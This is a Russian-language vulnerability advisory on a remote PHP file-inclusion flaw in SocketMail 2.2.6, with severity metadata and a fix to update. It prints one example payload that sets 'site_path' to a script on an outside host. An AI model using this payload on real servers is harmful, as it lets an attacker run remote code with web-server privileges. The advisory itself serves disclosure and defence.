PHP-инклюдинг в SocketMail

Дата публикации:
31.05.2006
Дата изменения:
24.03.2009
Всего просмотров:
2596
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SocketMail Lite 2.x
SocketMail Pro 2.x
Уязвимые версии: SocketMail 2.2.6, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "site_path" в сценариях "index.php" и "inc-common.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

site_path=http://www.yourspace.com/yourscript.php?

URL производителя: www.socketmail.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Socketmail <= 2.2.6 - Remote File Include Vulnerability

или введите имя

CAPTCHA